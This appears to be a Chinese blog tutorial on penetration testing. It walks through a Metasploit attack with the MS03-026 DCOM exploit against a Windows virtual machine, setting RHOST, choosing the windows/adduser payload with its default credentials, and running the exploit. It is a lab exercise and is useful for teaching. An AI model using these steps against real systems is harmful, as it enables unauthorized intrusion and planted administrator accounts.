渗透测试实例

一、msf> use exploit/windows/dcerpc/ms03_026_dcom。看到命令提示符的改变表明该命令已经运行成功。

二、为漏洞利用代码设置必要的参数,show options命令列出该漏洞利用代码的可用参数,之后用set命令即可对参数进行设置,其中有一些默认值。如下图:

查看Window虚拟机IP。如下图:

用set命令设置参数。如下图:

这里,RHOST用于指定远程目标主机的IP地址,RPORT用于指定默认的绑定端口。默认情况下,RPORT的值设置为135端口,在此,修改RHOST即可。

目前,RHOST的值已经被设置为目标IP地址,如果此时运行漏洞利用代码,会产生错误消息,因为还没有为该漏洞利用代码选择攻击载荷。

三、选择攻击载荷,可以使用命令show payloads列出所有可用的攻击载荷。如下图:

这里选择最简单的window/adduser攻击载荷,其功能是在目标机器操作系统中添加新用户。如下图:

四、再次运行show options命令,将列出漏洞利用代码与攻击载荷的所有参数。攻击载荷参数形式如下图:

结果中可以看到添加到目标操作系统的缺省用户名和口令是metasploit和Metasploit$1,若需要更改这些值,可以使用set USER和set PASS更改。

五、攻击载荷设置完成,对目标机器进行渗透。

msf exploit(ms03_026_dcom)> exploit

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值